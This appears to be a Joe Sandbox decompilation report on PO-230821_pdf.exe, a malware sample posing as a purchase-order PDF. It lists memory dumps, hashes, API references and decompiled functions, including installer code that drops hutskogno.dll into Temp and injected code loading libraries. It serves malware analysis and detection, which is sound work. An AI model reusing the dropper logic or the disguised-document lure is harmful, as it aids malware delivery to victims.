Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 1646373207-1276376045
Opcode ID: 040de483115e28654e06a21dde0c8c6013ab8d4b0f4902904f772b877cdfe749
Instruction ID: b3a791a94bc65956dbcabe6bd8d5577e249d2fb022347dc57580776b7674d52e
Opcode Fuzzy Hash: 040de483115e28654e06a21dde0c8c6013ab8d4b0f4902904f772b877cdfe749
Instruction Fuzzy Hash: ACD06731240609BBFB81EBA1CC45F9B7AACFB116C2F004174F646E1469DB71DB04A765

Uniqueness

Uniqueness Score: -1.00%

Function 00405F37 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00405F37(WCHAR* _a4) {
				WCHAR* _t9;

				_t9 = _a4;
				_push( &(_t9[lstrlenW(_t9)]));
				_push(_t9);
				if( *(CharPrevW()) != 0x5c) {
					lstrcatW(_t9, 0x40a014);
				}
				return _t9;
			}

0x00405f38
0x00405f45
0x00405f46
0x00405f51
0x00405f59
0x00405f59
0x00405f61

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F3D
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040362D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403923), ref: 00405F47
lstrcatW.KERNEL32(?,0040A014), ref: 00405F59

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405F37

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-1098563871
Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction ID: 9007417a49851ea4d61da9c71e51c63d156abd36d345156a737e00ee84923012
Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
Instruction Fuzzy Hash: 59D05E611019246AC111AB548D04DDB63ACAE85304742046AF601B60A0CB7E196287ED

Uniqueness

Uniqueness Score: -1.00%

Function 10006EED Relevance: 6.1, APIs: 4, Instructions: 96
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E10006EED(void* __edx, short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				intOrPtr _v12;
				int _v20;
				void* __ebx;
				int _t35;
				int _t38;
				intOrPtr* _t44;
				int _t47;
				short* _t49;
				intOrPtr _t50;
				intOrPtr _t54;
				int _t55;
				int _t60;
				char* _t63;

				_t63 = _a8;
				if(_t63 == 0) {
					L5:
					return 0;
				}
				_t50 = _a12;
				if(_t50 == 0) {
					goto L5;
				}
				if( *_t63 != 0) {
					E10002F18(_t50,  &_v20, __edx, _a16);
					_t35 = _v20;
					__eflags =  *(_t35 + 0xa8);
					if( *(_t35 + 0xa8) != 0) {
						_t38 = E10006E35( *_t63 & 0x000000ff,  &_v20);
						__eflags = _t38;
						if(_t38 == 0) {
							__eflags = _a4;
							_t60 = 1;
							__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t63, 1, _a4, 0 | _a4 != 0x00000000);
							if(__eflags != 0) {
								L21:
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t31 = _t54 + 0x70;
									 *_t31 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t31;
								}
								return _t60;
							}
							L20:
							_t44 = E10003A67(__eflags);
							_t60 = _t60 | 0xffffffff;
							__eflags = _t60;
							 *_t44 = 0x2a;
							goto L21;
						}
						_t60 = _v20;
						__eflags =  *(_t60 + 0x74) - 1;
						if( *(_t60 + 0x74) <= 1) {
							L15:
							__eflags = _t50 -  *(_t60 + 0x74);
							L16:
							if(__eflags < 0) {
								goto L20;
							}
							__eflags = _t63[1];
							if(__eflags == 0) {
								goto L20;
							}
							L18:
							_t60 =  *(_t60 + 0x74);
							goto L21;
						}
						__eflags = _t50 -  *(_t60 + 0x74);
						if(__eflags < 0) {
							goto L16;
						}
						__eflags = _a4;
						_t47 = MultiByteToWideChar( *(_t60 + 4), 9, _t63,  *(_t60 + 0x74), _a4, 0 | _a4 != 0x00000000);
						_t60 = _v20;
						__eflags = _t47;
						if(_t47 != 0) {
							goto L18;
						}
						goto L15;
					}
					_t55 = _a4;
					__eflags = _t55;
					if(_t55 != 0) {
						 *_t55 =  *_t63 & 0x000000ff;
					}
					_t60 = 1;
					goto L21;
				}
				_t49 = _a4;
				if(_t49 != 0) {
					 *_t49 = 0;
				}
				goto L5;
			}

0x10006ef5
0x10006efa
0x10006f14
0x00000000
0x10006f14
0x10006efc
0x10006f01
0x00000000
0x00000000
0x10006f06
0x10006f21
0x10006f26
0x10006f29
0x10006f30
0x10006f4f
0x10006f56
0x10006f58
0x10006f9c
0x10006fa4
0x10006fb9
0x10006fbb
0x10006fcb
0x10006fcb
0x10006fcf
0x10006fd1
0x10006fd4
0x10006fd4
0x10006fd4
0x10006fd4
0x00000000
0x10006fda
0x10006fbd
0x10006fbd
0x10006fc2
0x10006fc2
0x10006fc5
0x00000000
0x10006fc5
0x10006f5a
0x10006f5d
0x10006f61
0x10006f8a
0x10006f8a
0x10006f8d
0x10006f8d
0x00000000
0x00000000
0x10006f8f
0x10006f93
0x00000000
0x00000000
0x10006f95
0x10006f95
0x00000000
0x10006f95
0x10006f63
0x10006f66
0x00000000
0x00000000
0x10006f6a
0x10006f7d
0x10006f83
0x10006f86
0x10006f88
0x00000000
0x00000000
0x00000000
0x10006f88
0x10006f32
0x10006f35
0x10006f37
0x10006f3c
0x10006f3c
0x10006f41
0x00000000
0x10006f41
0x10006f08
0x10006f0d
0x10006f11
0x10006f11
0x00000000

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 10006F21
__isleadbyte_l.LIBCMT ref: 10006F4F
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 10006F7D
MultiByteToWideChar.KERNEL32(00000080,00000009,00000108,00000001,?,00000000), ref: 10006FB3

Memory Dump Source

Source File: 00000000.00000002.1090537382.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true

Associated: 00000000.00000002.1090439224.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090718211.0000000010008000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090787426.000000001000B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000000.00000002.1090909986.000000001000E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_10000000_PO-230821_pdf.jbxd

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 3e37b5fd8b292c56ca421d15e2d83d6598a2f22aaba71977e649cf7cfa98953f
Instruction ID: 60f1d58214d7dd26ee1f2bfda8bb28617081854c5ad05abbddf6d5a73fe3e510
Opcode Fuzzy Hash: 3e37b5fd8b292c56ca421d15e2d83d6598a2f22aaba71977e649cf7cfa98953f
Instruction Fuzzy Hash: 4C316931600257AFEB11CF64DC45BBA7BE6FF492E0F228438F4609B195E730A951DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0040263E Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 65
stringCOMMON

Download Yara Rule

C-Code - Quality: 92%

			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
				signed int _t14;
				int _t17;
				void* _t24;
				intOrPtr* _t29;
				void* _t31;
				signed int _t32;
				void* _t35;
				void* _t40;
				signed int _t42;

				_t29 = __edi;
				_t24 = __ebx;
				_t14 =  *(_t35 - 0x28);
				_t40 = __edx - 0x38;
				 *(_t35 - 0x10) = _t14;
				_t27 = 0 | _t40 == 0x00000000;
				_t32 = _t40 == 0;
				if(_t14 == __ebx) {
					if(__edx != 0x38) {
						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
					} else {
						E00402DA6(0x21);
						E0040668A("C:\Users\Alvin\AppData\Local\Temp\nsv6B4F.tmp", "C:\Users\Alvin\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll", 0x400);
						_t17 = lstrlenA("C:\Users\Alvin\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll");
					}
				} else {
					E00402D84(1);
					 *0x40adf8 = __ax;
					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
				}
				 *(_t35 + 8) = _t17;
				if( *_t29 == _t24) {
					L13:
					 *((intOrPtr*)(_t35 - 4)) = 1;
				} else {
					_t31 = E004065C8(_t27, _t29);
					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E00406239(_t31, _t31) >= 0) {
						_t14 = E0040620A(_t31, "C:\Users\Alvin\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll",  *(_t35 + 8));
						_t42 = _t14;
						if(_t42 == 0) {
							goto L13;
						}
					} else {
						goto L13;
					}
				}
				 *0x42a2e8 =  *0x42a2e8 +  *((intOrPtr*)(_t35 - 4));
				return 0;
			}

0x0040263e
0x0040263e
0x0040263e
0x00402643
0x00402646
0x00402649
0x0040264e
0x00402650
0x00402670
0x004026aa
0x00402672
0x00402674
0x00402688
0x00402695
0x00402695
0x00402652
0x00402654
0x00402659
0x00402667
0x0040266a
0x004026af
0x004026b2
0x0040292e
0x0040292e
0x004026b8
0x004026c1
0x004026c3
0x004026e2
0x004015b4
0x004015b6
0x00000000
0x004015bc
0x00000000
0x00000000
0x00000000
0x004026c3
0x00402c2d
0x00402c39

APIs

lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll), ref: 00402695

Strings

C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll, xrefs: 00402659, 0040267E, 00402690, 004026DC
C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp, xrefs: 00402683

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: lstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp$C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp\hutskogno.dll
API String ID: 1659193697-3326437127
Opcode ID: 4a9067d827a4b8c099a0c03f7ab0fb9ba25826a25fc5163b758c2c2faf7004e8
Instruction ID: f1e3379d491753f9d96dc3c217618d2e64da59e9cc8309568291ba5d2d488428
Opcode Fuzzy Hash: 4a9067d827a4b8c099a0c03f7ab0fb9ba25826a25fc5163b758c2c2faf7004e8
Instruction Fuzzy Hash: D511C472A00205EBCB10BBB18E4AA9E76619F44758F21483FE402B61C1DAFD8891965F

Uniqueness

Uniqueness Score: -1.00%

Function 00403C25 Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 20
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403C25() {
				void* _t1;
				void* _t2;
				signed int _t11;

				_t1 =  *0x40a018; // 0x2dc
				if(_t1 != 0xffffffff) {
					CloseHandle(_t1);
					 *0x40a018 =  *0x40a018 | 0xffffffff;
				}
				_t2 =  *0x40a01c; // 0x2f0
				if(_t2 != 0xffffffff) {
					CloseHandle(_t2);
					 *0x40a01c =  *0x40a01c | 0xffffffff;
					_t11 =  *0x40a01c;
				}
				E00403C82();
				return E00405D74(_t11, L"C:\\Users\\Alvin\\AppData\\Local\\Temp\\nsv6B4F.tmp", 7);
			}

0x00403c25
0x00403c34
0x00403c37
0x00403c39
0x00403c39
0x00403c40
0x00403c48
0x00403c4b
0x00403c4d
0x00403c4d
0x00403c4d
0x00403c54
0x00403c66

APIs

CloseHandle.KERNEL32(000002DC,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C37
CloseHandle.KERNEL32(000002F0,C:\Users\user\AppData\Local\Temp\,00403B71,?), ref: 00403C4B

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00403C2A
C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp, xrefs: 00403C5B

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: CloseHandle
String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\nsv6B4F.tmp
API String ID: 2962429428-4266610100
Opcode ID: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
Instruction ID: ab9e488bef71b432d29da19662b82269d7b8f1628316f3e3d8f7e3aa77a32ace
Opcode Fuzzy Hash: 3450910aa3eb4a83e9339ad550daa728f038e8843dee50fd20da138f79135bda
Instruction Fuzzy Hash: 3BE0863244471496E5246F7DAF4D9853B285F413357248726F178F60F0C7389A9B4A9D

Uniqueness

Uniqueness Score: -1.00%

Function 0040563E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
windowCOMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040563E(struct HWND__* _a4, int _a8, int _a12, long _a16) {
				int _t15;
				long _t16;

				_t15 = _a8;
				if(_t15 != 0x102) {
					if(_t15 != 0x200) {
						_t16 = _a16;
						L7:
						if(_t15 == 0x419 &&  *0x423734 != _t16) {
							_push(_t16);
							_push(6);
							 *0x423734 = _t16;
							E00404FFF();
						}
						L11:
						return CallWindowProcW( *0x42373c, _a4, _t15, _a12, _t16);
					}
					if(IsWindowVisible(_a4) == 0) {
						L10:
						_t16 = _a16;
						goto L11;
					}
					_t16 = E00404F7F(_a4, 1);
					_t15 = 0x419;
					goto L7;
				}
				if(_a12 != 0x20) {
					goto L10;
				}
				E00404610(0x413);
				return 0;
			}

0x00405642
0x0040564c
0x00405668
0x0040568a
0x0040568d
0x00405693
0x0040569d
0x0040569e
0x004056a0
0x004056a6
0x004056a6
0x004056b0
0x00000000
0x004056be
0x00405675
0x004056ad
0x004056ad
0x00000000
0x004056ad
0x00405681
0x00405683
0x00000000
0x00405683
0x00405652
0x00000000
0x00000000
0x00405659
0x00000000

APIs

IsWindowVisible.USER32(?), ref: 0040566D
CallWindowProcW.USER32(?,?,?,?), ref: 004056BE

Part of subcall function 00404610: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404622

Strings

, xrefs: 0040564E

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID:
API String ID: 3748168415-3916222277
Opcode ID: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
Instruction ID: 537e1cae7e4c88fb21f4f8cfd237bdd46b0b38e99f2a5e053ca6ba0093d9a5c8
Opcode Fuzzy Hash: a73dc4e993bde12ea44745026bd4b5676165c6f206d332bc9731ab0fc1b08652
Instruction Fuzzy Hash: 4401B171200608AFEF205F11DD84A6B3A35EB84361F904837FA08752E0D77F8D929E6D

Uniqueness

Uniqueness Score: -1.00%

Function 00405F83 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16
stringCOMMON

Download Yara Rule

C-Code - Quality: 77%

			E00405F83(WCHAR* _a4) {
				WCHAR* _t5;
				WCHAR* _t7;

				_t7 = _a4;
				_t5 =  &(_t7[lstrlenW(_t7)]);
				while( *_t5 != 0x5c) {
					_push(_t5);
					_push(_t7);
					_t5 = CharPrevW();
					if(_t5 > _t7) {
						continue;
					}
					break;
				}
				 *_t5 =  *_t5 & 0x00000000;
				return  &(_t5[1]);
			}

0x00405f84
0x00405f8e
0x00405f91
0x00405f97
0x00405f98
0x00405f99
0x00405fa1
0x00000000
0x00000000
0x00000000
0x00405fa1
0x00405fa3
0x00405fab

APIs

lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO-230821_pdf.exe,C:\Users\user\Desktop\PO-230821_pdf.exe,80000000,00000003), ref: 00405F89
CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,0040313C,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\PO-230821_pdf.exe,C:\Users\user\Desktop\PO-230821_pdf.exe,80000000,00000003), ref: 00405F99

Strings

C:\Users\user\Desktop, xrefs: 00405F83

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\Desktop
API String ID: 2709904686-2110743547
Opcode ID: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction ID: bd974b3f77e4b05eb9372a1ad14375fba7b947cfa10dd8d614d5bb7090e452f7
Opcode Fuzzy Hash: 176def5b2db9ef34a9f22db2929791273b03e08e07d7b66f37effa829582f156
Instruction Fuzzy Hash: 6CD05EB2401D219EC3126B04DC00D9F63ACEF51301B4A4866E441AB1A0DB7C5D9186A9

Uniqueness

Uniqueness Score: -1.00%

Function 004060BD Relevance: 5.0, APIs: 4, Instructions: 37
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004060BD(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}

0x004060cd
0x004060cf
0x004060d2
0x004060fe
0x004060d7
0x004060e0
0x004060e5
0x004060f0
0x004060f3
0x0040610f
0x004060f5
0x004060fc
0x00000000
0x004060fc
0x00406108
0x0040610c
0x0040610c
0x00406106
0x00000000

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060CD
lstrcmpiA.KERNEL32(00000000,00000000), ref: 004060E5
CharNextA.USER32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060F6
lstrlenA.KERNEL32(00000000,?,00000000,004063A2,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060FF

Memory Dump Source

Source File: 00000000.00000002.1087576843.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1087547373.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087621306.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087648952.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1087782785.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_PO-230821_pdf.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction ID: 2f06b96f93541eceebcae48a9adfe7aedd37cb678349478f8cad11de2473fd3e
Opcode Fuzzy Hash: 4f145c51a58837bd7eda372618efc6ab74ada67201017ca859b4805a40dfc06b
Instruction Fuzzy Hash: 0BF0F631104054FFDB12DFA4CD00D9EBBA8EF06350B2640BAE841FB321D674DE11A798

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: PO-230821_pdf.exePID: 7148, Parent PID: 7080COMMON

Execution Graph

Execution Coverage:	4.8%
Dynamic/Decrypted Code Coverage:	8.6%
Signature Coverage:	6.6%
Total number of Nodes:	590
Total number of Limit Nodes:	75

Executed Functions

Function 0041A3FA Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445

Strings

bMA, xrefs: 0041A422, 0041A430
bMA, xrefs: 0041A43D, 0041A444
!JA, xrefs: 0041A41C, 0041A428

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: 2c8588b20b24e4b2187341ba4b4032ffef7b20e8c53d5e7ae378a0059d2b3bb7
Instruction ID: 28bdc840a14360ebbda241b8f69ab392724aee22cae486fb9bb772aba9465b91
Opcode Fuzzy Hash: 2c8588b20b24e4b2187341ba4b4032ffef7b20e8c53d5e7ae378a0059d2b3bb7
Instruction Fuzzy Hash: 15F0E2B2200108AFCB14DF99CC85EEB77A9AF8C354F158649BA1DE7241CA30E811CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 0041A400 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36
filenativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 37%

			E0041A400(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041AF50(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x414a21
				_t6 =  &_a32; // 0x414d62
				_t12 =  &_a8; // 0x414d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}

0x0041a403
0x0041a40f
0x0041a417
0x0041a41c
0x0041a422
0x0041a43d
0x0041a445
0x0041a449

APIs

NtReadFile.NTDLL(bMA,5EB65239,FFFFFFFF,?,?,?,bMA,?,!JA,FFFFFFFF,5EB65239,00414D62,?,00000000), ref: 0041A445

Strings

bMA, xrefs: 0041A422, 0041A430
bMA, xrefs: 0041A43D, 0041A444
!JA, xrefs: 0041A41C, 0041A428

Memory Dump Source

Source File: 00000002.00000002.1174359010.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_PO-230821_pdf.jbxd

Yara matches

Similarity

API ID: FileRead
String ID: !JA$bMA$bMA
API String ID: 2738559852-4222312340
Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction ID: 27817754ac388b25b847a3362b671b2e44b934df7eae6808a762aa4d31f9cf83
Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
Instruction Fuzzy Hash: 93F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040ACE0 Relevance: 1.5, APIs: 1, Instructions: 48
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0040ACE0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041CC40( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041D060(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041D2E0( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041B490(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}

0x0040acfc
0x0040acff
0x0040ad04
0x0040ad09
0x0040ad13
0x0040ad18
0x0040ad1b
0x0040ad1d
0x0040ad25
0x0040ad2a
0x0040ad2a
0x0040ad31
0x0040ad39
0x0040ad3c
0x0040ad3e
0x0040ad52
0x00000000
0x0040ad54
0x0040ad5a
0x0040ad0e
0x0040ad0e
0x0040ad0e

APIs

LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD52

Memory Dump Source

